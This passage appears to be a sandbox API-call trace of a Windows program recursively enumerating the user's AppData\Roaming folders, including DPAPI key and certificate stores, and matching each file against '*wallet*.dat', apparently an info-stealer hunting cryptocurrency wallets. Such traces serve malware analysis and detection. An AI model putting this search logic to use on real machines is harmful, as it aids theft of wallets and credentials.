dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="cfeedb70-e610-451b-90c2-def194b5fe80", cAlternateFileName="CFEEDB~1")) returned 1 [0234.741] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 139 [0234.741] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80") returned 101 [0234.741] PathMatchSpecA (pszFile="cfeedb70-e610-451b-90c2-def194b5fe80", pszSpec="*wallet*.dat") returned 0 [0234.741] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*") returned 141 [0234.741] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\cfeedb70-e610-451b-90c2-def194b5fe80\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x5088b163, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5088b163, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xa5626547, ftLastWriteTime.dwLowDateTime=0x1d7a941, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1d4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x660063, cFileName="e", cAlternateFileName="C")) returned 0xffffffff [0234.741] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5627f2fe, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0234.741] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 112 [0234.742] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred") returned 74 [0234.742] PathMatchSpecA (pszFile="Preferred", pszSpec="*wallet*.dat") returned 0 [0234.742] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred\\*") returned 114 [0234.742] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\Preferred\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x5088b163, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5088b163, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x5627f2fe, ftLastWriteTime.dwLowDateTime=0x1d82a22, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x18, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x720050, cFileName="e", cAlternateFileName="C")) returned 0xffffffff [0234.742] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5088b163, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5088b163, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5627f2fe, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0234.742] FindClose (in: hFindFile=0x6e17a0 | out: hFindFile=0x6e17a0) returned 1 [0234.742] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xa563624b, ftLastWriteTime.dwHighDateTime=0x1d7a941, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0234.742] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 64 [0234.742] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Protect\\SYNCHIST") returned 26 [0234.742] PathMatchSpecA (pszFile="SYNCHIST", pszSpec="*wallet*.dat") returned 0 [0234.742] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST\\*") returned 66 [0234.742] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x44792966, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x44792966, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0xa563624b, ftLastWriteTime.dwLowDateTime=0x1d7a941, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4c, nFileSizeLow=0x18, dwReserved0=0x207d0, dwReserved1=0x590053, cFileName="N", cAlternateFileName="PREFER~1Ð\x07\x02")) returned 0xffffffff [0234.743] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xa563624b, ftLastWriteTime.dwHighDateTime=0x1d7a941, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0234.743] FindClose (in: hFindFile=0x6e1da0 | out: hFindFile=0x6e1da0) returned 1 [0234.743] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c, dwReserved1=0x18, cFileName="Spelling", cAlternateFileName="")) returned 1 [0234.743] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling") returned 56 [0234.743] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling") returned 18 [0234.743] PathMatchSpecA (pszFile="Spelling", pszSpec="*wallet*.dat") returned 0 [0234.743] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*") returned 58 [0234.743] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1620 [0234.744] FindNextFileA (in: hFindFile=0x6e1620, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.745] FindNextFileA (in: hFindFile=0x6e1620, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="en-US", cAlternateFileName="")) returned 1 [0234.745] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US") returned 62 [0234.745] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US") returned 24 [0234.745] PathMatchSpecA (pszFile="en-US", pszSpec="*wallet*.dat") returned 0 [0234.745] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*") returned 64 [0234.745] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1b60 [0234.745] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.746] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567d5b26, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.acl", cAlternateFileName="")) returned 1 [0234.746] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl") returned 74 [0234.746] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US\\default.acl") returned 36 [0234.746] PathMatchSpecA (pszFile="default.acl", pszSpec="*wallet*.dat") returned 0 [0234.746] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl\\*") returned 76 [0234.746] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.acl\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x567d5b26, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x567d5b26, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0x567d5b26, ftLastWriteTime.dwLowDateTime=0x1d70460, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0234.746] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5648e4eb, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5648e4eb, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5648e4eb, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.dic", cAlternateFileName="")) returned 1 [0234.746] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic") returned 74 [0234.746] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Spelling\\en-US\\default.dic") returned 36 [0234.746] PathMatchSpecA (pszFile="default.dic", pszSpec="*wallet*.dat") returned 0 [0234.746] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.dic\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x5648e4eb, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x5648e4eb, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0x5648e4eb, ftLastWriteTime.dwLowDateTime=0x1d70460, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0234.746] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 1 [0234.747] PathMatchSpecA (pszFile="default.exc", pszSpec="*wallet*.dat") returned 0 [0234.747] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Spelling\\en-US\\default.exc\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x566a47fe, ftCreationTime.dwLowDateTime=0x1d70460, ftCreationTime.dwHighDateTime=0x566a47fe, ftLastAccessTime.dwLowDateTime=0x1d70460, ftLastAccessTime.dwHighDateTime=0x566a47fe, ftLastWriteTime.dwLowDateTime=0x1d70460, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x650064, cFileName="f", cAlternateFileName="C")) returned 0xffffffff [0234.747] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a47fe, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x566a47fe, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x566a47fe, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="default.exc", cAlternateFileName="")) returned 0 [0234.747] FindClose (in: hFindFile=0x6e1b60 | out: hFindFile=0x6e1b60) returned 1 [0234.747] FindNextFileA (in: hFindFile=0x6e1620, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5635d3c1, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x567d5b26, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x567d5b26, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18, dwReserved1=0x207d0, cFileName="en-US", cAlternateFileName="")) returned 0 [0234.747] FindClose (in: hFindFile=0x6e1620 | out: hFindFile=0x6e1620) returned 1 [0234.748] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x18, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0234.748] PathMatchSpecA (pszFile="SystemCertificates", pszSpec="*wallet*.dat") returned 0 [0234.748] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1720 [0234.748] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.748] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="My", cAlternateFileName="")) returned 1 [0234.748] PathMatchSpecA (pszFile="My", pszSpec="*wallet*.dat") returned 0 [0234.748] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1be0 [0234.749] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.749] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0234.749] PathMatchSpecA (pszFile="AppContainerUserCertRead", pszSpec="*wallet*.dat") returned 0 [0234.749] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x5ec61c93, ftCreationTime.dwLowDateTime=0x1d70068, ftCreationTime.dwHighDateTime=0x5ec61c93, ftLastAccessTime.dwLowDateTime=0x1d70068, ftLastAccessTime.dwHighDateTime=0x5ec61c93, ftLastWriteTime.dwLowDateTime=0x1d70068, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0x6b0260, dwReserved1=0x700041, cFileName="p", cAlternateFileName="C")) returned 0xffffffff [0234.750] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0234.750] PathMatchSpecA (pszFile="Certificates", pszSpec="*wallet*.dat") returned 0 [0234.750] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1ae0 [0234.750] FindNextFileA (in: hFindFile=0x6e1ae0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.750] FindNextFileA (in: hFindFile=0x6e1ae0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 0 [0234.750] FindClose (in: hFindFile=0x6e1ae0 | out: hFindFile=0x6e1ae0) returned 1 [0234.750] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5, cFileName="CRLs", cAlternateFileName="")) returned 1 [0234.750] PathMatchSpecA (pszFile="CRLs", pszSpec="*wallet*.dat") returned 0 [0234.750] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1960 [0234.751] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.751] FindNextFileA (in: hFindFile=0x6e1960, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, 